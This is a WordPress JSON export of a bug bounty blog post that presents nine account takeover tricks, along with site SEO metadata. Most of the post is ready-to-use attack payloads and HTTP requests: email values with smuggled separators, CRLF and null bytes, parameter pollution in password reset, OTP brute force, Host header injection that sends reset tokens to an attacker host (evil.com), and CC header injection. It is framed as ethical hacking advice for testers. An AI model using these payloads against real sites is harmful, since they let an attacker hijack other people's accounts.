{"id":3008,"date":"2023-08-21T07:41:35","date_gmt":"2023-08-21T07:41:35","guid":{"rendered":"https:\/\/secry.me\/explore\/?p=3008"},"modified":"2024-09-24T03:12:16","modified_gmt":"2024-09-24T03:12:16","slug":"bug-bounty-trick-to-find-account-takeover-and-get-bounty","status":"publish","type":"post","link":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/","title":{"rendered":"Bug Bounty: Trick to Find Account Takeover and GET BOUNTY"},"content":{"rendered":"<p><a href=\"https:\/\/secry.me\/explore\/tips-and-tricks\/bug-bounty-tips-account-takeover\/\">Tips Account Takeover<\/a>: Welcome to our in-depth guide on mastering the art of bug bounty hunting, focusing specifically on account takeover techniques. In today&#8217;s ever-evolving cybersecurity landscape, staying a step ahead of potential vulnerabilities is absolutely crucial. 
In this article, we&#8217;re going to dive deep into a variety of techniques that revolve around exploiting account takeover vulnerabilities, with a special emphasis on the concept of &#8220;Email Replacing&#8221; during the account registration process.<\/p>\n<p>We&#8217;ll also explore techniques like &#8220;Parameter Pollution&#8221; in reset password functionalities, &#8220;OTP Code Bruteforce,&#8221; &#8220;Host Header Injection,&#8221; and even the clever use of separators within parameter values, among other tactics.<\/p>\n<p>Throughout this guide, we&#8217;ll provide you with real-world examples and break down the mechanics behind each technique. Our goal is to arm you with the knowledge and insights necessary to not only identify and understand these vulnerabilities, but also to ethically report them and contribute to a safer digital ecosystem.<\/p>\n<p>So, whether you&#8217;re someone looking to explore the exciting world of ethical hacking or a dedicated security enthusiast, keep reading to elevate your bug bounty skills and play a vital role in ensuring online security.<\/p>\n<p>&nbsp;<\/p>\n<h3>1. 
Account Takeover Through Email Replacing when Registering Account (testing\/abuse email filter)<\/h3>\n<p><strong>Example:<\/strong><\/p>\n<p>email@email.com<strong>,<\/strong>victim@hack.secry<br \/>\nemail@email<strong>&quot;,&quot;<\/strong>victim@hack.secry<br \/>\nemail@email.com<strong>:<\/strong>victim@hack.secry<br \/>\nemail@email.com<strong>%0d%0a<\/strong>victim@hack.secry<br \/>\n<strong>%0d%0a<\/strong>victim@hack.secry<br \/>\n<strong>%0a<\/strong>victim@hack.secry<br \/>\nvictim@hack.secry<strong>%0d%0a<\/strong><br \/>\nvictim@hack.secry<strong>%0a<\/strong><br \/>\nvictim@hack.secry<strong>%0d<\/strong><br \/>\nvictim@hack.secry<strong>%00<\/strong><br \/>\nvictim@hack.secry<strong>{{}}<\/strong><\/p>\n<p><strong>Example Request:<\/strong><\/p>\n<p>name=<strong><em>HACKER<\/em><\/strong>&amp;email=<em><strong>HACKER@wearehackerone.com<\/strong><\/em>&amp;email=<em><strong>victim@hack.secry<\/strong><\/em>&amp;username=<em><strong>hackerz<\/strong><\/em>&amp;password=<strong>THIS_ISPASSWORD_TO_TAKEOVER<\/strong>&amp;password-confirmation=<strong>THIS_ISPASSWORD_TO_TAKEOVER<\/strong>&amp;_csrf_token=XXX7139a5209c08aec2dbff06f5ab5XXXXXXXXXX<\/p>\n<h3>2. Account Takeover Through Parameter Pollution in Reset Password<\/h3>\n<p><strong>Example:<\/strong><\/p>\n<p>POST \/passwordReset<br \/>\n[&#8230;]<br \/>\nemail=victim@yahoo.com&amp;email=hacker@yahoo.com<\/p>\n<p>or in JSON:<\/p>\n<p>{&quot;email&quot;:[&quot;andrew@hotmail.com&quot;,&quot;hacker@gmail.com&quot;]}<\/p>\n<p>&nbsp;<\/p>\n<h3>3. Account Takeover Through OTP Code Bruteforce<\/h3>\n<p><strong>Example:<\/strong><\/p>\n<p>POST \/reset<br \/>\n[&#8230;]<br \/>\nemail=victim@mail.com&amp;code=$12345$<\/p>\n<p>You can use <a href=\"https:\/\/portswigger.net\/burp\/documentation\/desktop\/tools\/intruder\">Burp Intruder<\/a>.<\/p>\n<p>&nbsp;<\/p>\n<h3>4. 
Account Takeover Through Host Header Injection<\/h3>\n<p><strong>Example:<\/strong><\/p>\n<p>POST \/reset<br \/>\nHost: evilsite.com<br \/>\n[&#8230;]<br \/>\nemail=victim@mail.com<\/p>\n<p>POST \/reset<br \/>\nHost: target.com<br \/>\nX-Forwarded-Host: evil.com<br \/>\n[&#8230;]<br \/>\nemail=victim@mail.com<\/p>\n<p>The victim will then receive the <strong>reset link<\/strong> email, and the link with the &#8220;<strong>token<\/strong>&#8221; will contain &#8220;<strong>evilsite.com<\/strong>&#8221;, so when the user clicks the link, the &#8220;token&#8221; will be logged\/extracted to the evilsite.com server log.<\/p>\n<p>&nbsp;<\/p>\n<h3>5. Account Takeover Through Using Separator in Value of the Parameter<\/h3>\n<p><strong>Example:<\/strong><\/p>\n<p>POST \/PWreset<br \/>\n[&#8230;]<br \/>\nemail=victim@mail.com<strong>,<\/strong>hacker@mail.com<\/p>\n<p>POST \/PWreset<br \/>\n[&#8230;]<br \/>\nemail=victim@mail.com<strong>%20<\/strong>hacker@mail.com<\/p>\n<p>POST \/PWreset<br \/>\n[&#8230;]<br \/>\nemail=victim@mail.com<strong>|<\/strong>hacker@mail.com<\/p>\n<p>POST \/PWreset<br \/>\n[&#8230;]<br \/>\nemail=victim@mail.com<strong>%00<\/strong>hacker@mail.com<\/p>\n<p>&nbsp;<\/p>\n<h3>6. Try input No Domain in Value of the Parameter to Account Takeover<\/h3>\n<p><strong>Example:<\/strong><\/p>\n<p>POST \/registeraccount<br \/>\n[&#8230;]<br \/>\nemail=victimemail<\/p>\n<p>&nbsp;<\/p>\n<h3>7. Try input No TLD in Email Value of the Parameter<\/h3>\n<p><strong>Example:<\/strong><\/p>\n<p>POST \/reset<br \/>\n[&#8230;]<br \/>\nemail=victimemail@mail.secry<\/p>\n<p>POST \/reset<br \/>\n[&#8230;]<br \/>\nemail=victim@mail.com%0a%0dcc:hacker@secry.me<\/p>\n<p>&nbsp;<\/p>\n<h3>8. 
Try Re-Sign up using Same Email<\/h3>\n<p><strong>Example:<\/strong><\/p>\n<p>POST \/newaccount<br \/>\n[&#8230;]<br \/>\nemail=victim@secry.me&amp;password=1234<\/p>\n<p>After signing up with the victim&#8217;s email, try signing up again with a different password.<\/p>\n<p>POST \/newaccount<br \/>\n[&#8230;]<br \/>\nemail=victim@secry.me&amp;password=yourehacked<\/p>\n<p>&nbsp;<\/p>\n<h3>9. If there is JSON data in requests, add a comma and input your hacker email<\/h3>\n<p><strong>Example:<\/strong><\/p>\n<p>POST \/newaccount<br \/>\n[&#8230;]<br \/>\n{&quot;email&quot;:&quot;victim@mail.com&quot;,&quot;hacker@secry.me&quot;,&quot;token&quot;:&quot;xxxxxxxxxx&quot;}<\/p>\n<p>&nbsp;<\/p>\n<h3>CLOSING<\/h3>\n<p>We acquired these account takeover tricks from various sources, with one of them being daffainfo. Among these multiple tricks, there are a few that I have personally attempted and successfully executed. I&#8217;m optimistic that you&#8217;ll achieve success with them as well, someday. Pinterest: <a href=\"https:\/\/www.pinterest.com\/pin\/1001699142167977631\">account takeover tips<\/a><\/p>\n<p>-SECRY<\/p>","protected":false},"excerpt":{"rendered":"<p>Tips Account Takeover: Welcome to our in-depth guide on mastering the 
art of bug bounty hunting, focusing specifically on account takeover techniques. In today&#8217;s ever-evolving cybersecurity landscape, staying a step ahead of potential vulnerabilities is absolutely crucial. In this article, we&#8217;re going to dive deep into a variety of technique that revolve around exploiting account [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":3036,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[195],"tags":[],"class_list":["post-3008","post","type-post","status-publish","format-standard","has-post-thumbnail","category-tips-and-tricks"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v21.4 (Yoast SEO v27.7) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Bug Bounty: Trick to Find Account Takeover and GET BOUNTY | SECRY<\/title>\n<meta name=\"description\" content=\"We&#039;re going to dive deep into a variety of technique that revolve around exploiting account takeover vulnerabilities, with a special emphasis on the concept of &quot;Email Replacing&quot; during the account registration process.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Bug Bounty: Trick to Find Account Takeover and GET BOUNTY | SECRY\" \/>\n<meta property=\"og:description\" content=\"Tips Account Takeover: Welcome to our in-depth guide on mastering the art of bug bounty hunting, focusing specifically on account takeover techniques. 
In\" \/>\n<meta property=\"og:url\" content=\"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/\" \/>\n<meta property=\"og:site_name\" content=\"SECRY\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/secry.me\" \/>\n<meta property=\"article:published_time\" content=\"2023-08-21T07:41:35+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-09-24T03:12:16+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/08\/TRICK-ACCOUNT-TAKE-OVER.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1280\" \/>\n\t<meta property=\"og:image:height\" content=\"720\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Christin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Christin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"NewsArticle\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/\"},\"author\":{\"name\":\"Christin\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/person\\\/907be2b2cdf630b0640516d22bb40deb\"},\"headline\":\"Bug Bounty: Trick to Find Account Takeover and GET BOUNTY\",\"datePublished\":\"2023-08-21T07:41:35+00:00\",\"dateModified\":\"2024-09-24T03:12:16+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/\"},\"wordCount\":659,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/TRICK-ACCOUNT-TAKE-OVER.png\",\"articleSection\":[\"Tips and Tricks\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/\",\"name\":\"Bug Bounty: Trick to Find Account Takeover and GET BOUNTY | 
SECRY\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/TRICK-ACCOUNT-TAKE-OVER.png\",\"datePublished\":\"2023-08-21T07:41:35+00:00\",\"dateModified\":\"2024-09-24T03:12:16+00:00\",\"description\":\"We're going to dive deep into a variety of technique that revolve around exploiting account takeover vulnerabilities, with a special emphasis on the concept of \\\"Email Replacing\\\" during the account registration process.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/#primaryimage\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/TRICK-ACCOUNT-TAKE-OVER.png\",\"contentUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/TRICK-ACCOUNT-TAKE-OVER.png\",\"width\":1280,\"height\":720,\"caption\":\"TRICK ACCOUNT TAKEOVER\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/secry.me\\\/explore\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Bug Bounty: Trick to Find 
Account Takeover and GET BOUNTY\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#website\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/\",\"name\":\"SECRY\",\"description\":\"#1 Cyber [SEC]urity Sto[RY]  -  News &amp; Bug Bounty Story Collections\",\"publisher\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\"},\"alternateName\":\"Security Story\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/secry.me\\\/explore\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\",\"name\":\"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections\",\"alternateName\":\"SECRY\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/secryweb.sirv.com\\\/WP_secry.me\\\/2022\\\/06\\\/cropped-SECRY.webp\",\"contentUrl\":\"https:\\\/\\\/secryweb.sirv.com\\\/WP_secry.me\\\/2022\\\/06\\\/cropped-SECRY.webp\",\"width\":512,\"height\":512,\"caption\":\"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story 
Collections\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/secry.me\",\"https:\\\/\\\/pinterest.com\\\/secry_me\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/person\\\/907be2b2cdf630b0640516d22bb40deb\",\"name\":\"Christin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"caption\":\"Christin\"},\"description\":\"A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.\",\"sameAs\":[\"https:\\\/\\\/secry.me\\\/explore\"],\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/author\\\/secry\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. 
-->","yoast_head_json":{"title":"Bug Bounty: Trick to Find Account Takeover and GET BOUNTY | SECRY","description":"We're going to dive deep into a variety of technique that revolve around exploiting account takeover vulnerabilities, with a special emphasis on the concept of \"Email Replacing\" during the account registration process.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/","og_locale":"en_US","og_type":"article","og_title":"Bug Bounty: Trick to Find Account Takeover and GET BOUNTY | SECRY","og_description":"Tips Account Takeover: Welcome to our in-depth guide on mastering the art of bug bounty hunting, focusing specifically on account takeover techniques. In","og_url":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/","og_site_name":"SECRY","article_publisher":"https:\/\/www.facebook.com\/secry.me","article_published_time":"2023-08-21T07:41:35+00:00","article_modified_time":"2024-09-24T03:12:16+00:00","og_image":[{"width":1280,"height":720,"url":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/08\/TRICK-ACCOUNT-TAKE-OVER.png","type":"image\/png"}],"author":"Christin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Christin","Est. 
reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"NewsArticle","@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/#article","isPartOf":{"@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/"},"author":{"name":"Christin","@id":"https:\/\/secry.me\/explore\/#\/schema\/person\/907be2b2cdf630b0640516d22bb40deb"},"headline":"Bug Bounty: Trick to Find Account Takeover and GET BOUNTY","datePublished":"2023-08-21T07:41:35+00:00","dateModified":"2024-09-24T03:12:16+00:00","mainEntityOfPage":{"@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/"},"wordCount":659,"commentCount":0,"publisher":{"@id":"https:\/\/secry.me\/explore\/#organization"},"image":{"@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/#primaryimage"},"thumbnailUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/08\/TRICK-ACCOUNT-TAKE-OVER.png","articleSection":["Tips and Tricks"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/","url":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/","name":"Bug Bounty: Trick to Find Account Takeover and GET BOUNTY | 
SECRY","isPartOf":{"@id":"https:\/\/secry.me\/explore\/#website"},"primaryImageOfPage":{"@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/#primaryimage"},"image":{"@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/#primaryimage"},"thumbnailUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/08\/TRICK-ACCOUNT-TAKE-OVER.png","datePublished":"2023-08-21T07:41:35+00:00","dateModified":"2024-09-24T03:12:16+00:00","description":"We're going to dive deep into a variety of technique that revolve around exploiting account takeover vulnerabilities, with a special emphasis on the concept of \"Email Replacing\" during the account registration process.","breadcrumb":{"@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/#primaryimage","url":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/08\/TRICK-ACCOUNT-TAKE-OVER.png","contentUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/08\/TRICK-ACCOUNT-TAKE-OVER.png","width":1280,"height":720,"caption":"TRICK ACCOUNT TAKEOVER"},{"@type":"BreadcrumbList","@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/secry.me\/explore\/"},{"@type":"ListItem","position":2,"name":"Bug Bounty: Trick to Find Account Takeover and GET BOUNTY"}]},{"@type":"WebSite","@id":"https:\/\/secry.me\/explore\/#website","url":"https:\/\/secry.me\/explore\/","name":"SECRY","description":"#1 Cyber [SEC]urity Sto[RY]  -  News &amp; Bug Bounty Story 
Collections","publisher":{"@id":"https:\/\/secry.me\/explore\/#organization"},"alternateName":"Security Story","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/secry.me\/explore\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/secry.me\/explore\/#organization","name":"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections","alternateName":"SECRY","url":"https:\/\/secry.me\/explore\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secry.me\/explore\/#\/schema\/logo\/image\/","url":"https:\/\/secryweb.sirv.com\/WP_secry.me\/2022\/06\/cropped-SECRY.webp","contentUrl":"https:\/\/secryweb.sirv.com\/WP_secry.me\/2022\/06\/cropped-SECRY.webp","width":512,"height":512,"caption":"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections"},"image":{"@id":"https:\/\/secry.me\/explore\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/secry.me","https:\/\/pinterest.com\/secry_me"]},{"@type":"Person","@id":"https:\/\/secry.me\/explore\/#\/schema\/person\/907be2b2cdf630b0640516d22bb40deb","name":"Christin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","caption":"Christin"},"description":"A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. 
Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.","sameAs":["https:\/\/secry.me\/explore"],"url":"https:\/\/secry.me\/explore\/author\/secry\/"}]}},"_links":{"self":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/3008","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/comments?post=3008"}],"version-history":[{"count":39,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/3008\/revisions"}],"predecessor-version":[{"id":4763,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/3008\/revisions\/4763"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/media\/3036"}],"wp:attachment":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/media?parent=3008"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/categories?post=3008"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/tags?post=3008"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}